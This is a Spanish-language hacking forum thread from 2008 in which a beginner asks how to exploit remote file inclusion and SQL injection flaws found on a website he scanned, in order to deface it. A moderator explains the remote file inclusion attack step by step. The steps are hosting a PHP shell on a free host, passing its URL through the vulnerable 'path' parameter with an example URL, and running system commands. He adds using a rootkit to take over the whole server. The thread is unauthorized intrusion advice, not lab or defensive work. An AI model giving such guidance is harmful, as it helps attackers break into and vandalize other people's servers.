Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 07, 2008, 02:57:11
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Help con la explotacion de estas "Vulnerabilidades" 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Help con la explotacion de estas "Vulnerabilidades"  (Leído 223 veces)
skullmaster-Back-
Visitante
« en: Febrero 03, 2008, 05:03:26 »
bueno como estoy comenzando en este de los defacing, pues necesito vuestra ayuda, escanee una pagina web y me dio estas dos vulne.

Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

y

phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities

bueno a ver si me podian decir que exploit utilizar o que programa o cosa utilizar!XD igual estare buscando en internet! Tongue espero que me ayuden! Tongue

Salu2's! Cool
En línea
The Shadow (Vacaciones)
Moderación
Colaborador
*****
Desconectado Desconectado

Mensajes: 754


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #1 en: Febrero 03, 2008, 07:43:05 »
weno man ... lo primero q te dice :

Cita de: skullmaster123 en Febrero 03, 2008, 05:03:26
Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

pos .... es vulnerable a atakes RFI ... si sabes usar esta tecnica usala .. sino ... busk info en la web

en cuanto a lo segundo :

Cita de: skullmaster123 en Febrero 03, 2008, 05:03:26
phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities

te dice q es vulnerable a atakes XSS ... = si sabes la tecnik .. usala ... sino ... busca en la web ..XD

PD: cualquier duda .... postea!

Saludos!
En línea




Reglamento del Foro     Linux  Registered User #473016
skullmaster-Back-
Visitante
« Respuesta #2 en: Febrero 03, 2008, 07:51:40 »
si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:

SQL Injection tambien eso significa que tambien es vulnerable a esta no??

Salu2's! Cool
En línea
ManCuerTex (Vacaciones)
Moderador Global
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1669


Cuando el respeto se pierde... muere la magia


Ver Perfil WWW
« Respuesta #3 en: Febrero 04, 2008, 03:10:26 »
Cita de: skullmaster123 en Febrero 03, 2008, 07:51:40
si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:

SQL Injection tambien eso significa que tambien es vulnerable a esta no??

Salu2's! Cool

Si.

La primera es sencilla de realizar, postea los pasos a seguir que haces y pon lo que no consigues.
En esta misma sección tienes manuales de estas 3 técnicas.


Saludos,
En línea

Soñaré Contigo Por Si No Te Veo Mañana...
Hacking Empezando desde 0
Haz Crecer Con Tu Visita La Mini Ciudad de El-Hacker.com!!
Próximamente Reto HacK v.2... (Finalizado!![Revisando code])
skullmaster-Back-
Visitante
« Respuesta #4 en: Febrero 04, 2008, 11:31:39 »
ok gracias, lei pero no encuentro la manera de hacerlo, lei aja de que se explotaba por ejemplo:

path?=

o algo asi, claro hay mas pero tengo una pregunta, se puede explotar de esta forma, osea si contiene esta manera:

si vamos a inicio me da: index.php
si vamos a otro lugar me da: modules.php?name=Content&pa=showpage&pid=13
y otro: modules.php?name=Downloads

alguna manera o es posible explotar esa vulnerabilidad desde estos puntos? tambien estoy localizando el XSS...........
pero segun tengo entendido y leido la primera es la mas facil, pero se me ha hecho imposible!XD Tongue bueno seguire leyendo e intentando y se me dan su ayuda, pues mejor! Wink

Salu2's! Cool
En línea
ManCuerTex (Vacaciones)
Moderador Global
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1669


Cuando el respeto se pierde... muere la magia


Ver Perfil WWW
« Respuesta #5 en: Febrero 04, 2008, 12:14:45 »
A ver te explico.

La vulnerabilidad te dice que está en index.php en la variable path.

Tienes que hacerte con una shell, aquí en esta sección seguro que encuentras muchas shells o alguna recopilación de shells.
Cuando tengas una shell de sistema en php, la guardarás como un archivo .txt y la subes a un hosting gratuito que tengas, tipo lycos o algo parecido, hasta que obtengamos una URL que nos lleve a nuestra shell.

Algo como lycos.es/skullmaster/shell.txt

Entonces abriríamos la página index.php y en la variable path le meteriamos nuestra shell, ya que tiene un fallo de seguridad y nos permite inyectar páginas y código a través de esa variable.

Quedaría algo como:
www.lokesea.com/index.php?path=http://lycos.es/skullmaster123/tushell.txt?

Eso te ejecutará la shell en remoto y podrás realizar cualquier acción de sistema.
Pero seguramente tendrás permisos de usuario, y querrás ser root, pero bueno para defacear esa página, con esos permisos ya podrás.

Si mas adelante te animas a defacear el server entero que seguro que contiene muchas páginas, deberás utilizar algun rootkit para conseguir ser root.


SAludos,
En línea

Soñaré Contigo Por Si No Te Veo Mañana...
Hacking Empezando desde 0
Haz Crecer Con Tu Visita La Mini Ciudad de El-Hacker.com!!
Próximamente Reto HacK v.2... (Finalizado!![Revisando code])
skullmaster-Back-
Visitante
« Respuesta #6 en: Febrero 04, 2008, 12:18:48 »
grax ya lo de la cuenta lycos lo hice ayer, voy a ver lo de la shell! Wink

Salu2's! Cool
En línea
[p3ll3]
Colaborador
*****
Desconectado Desconectado

Mensajes: 525

Read The Fucking Manual && STFU xDDD


Ver Perfil WWW
« Respuesta #7 en: Febrero 04, 2008, 03:05:45 »
Para lo de remote file inclusion creo que  "el Perro"  o  "Socket"  habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.


Saludos............ Cool
En línea


[[zix]]
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2026


¿Quieres saber?, toma tiempo para aprender.


Ver Perfil
« Respuesta #8 en: Febrero 04, 2008, 03:08:29 »
Cita de: [p3ll3] en Febrero 04, 2008, 03:05:45
Para lo de remote file inclusion creo que  "el Perro"  o  "Socket"  habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.


Saludos............ Cool

Bueno me tome la molesta de buscarlo sea por ayudar Grin

http://foro.el-hacker.com/index.php/topic,111464.0.html
En línea
[p3ll3]
Colaborador
*****
Desconectado Desconectado

Mensajes: 525

Read The Fucking Manual && STFU xDDD


Ver Perfil WWW
« Respuesta #9 en: Febrero 04, 2008, 03:23:43 »
 Wink ,eso es , esta bien !!!
En línea


Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Help con la explotacion de estas "Vulnerabilidades" « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC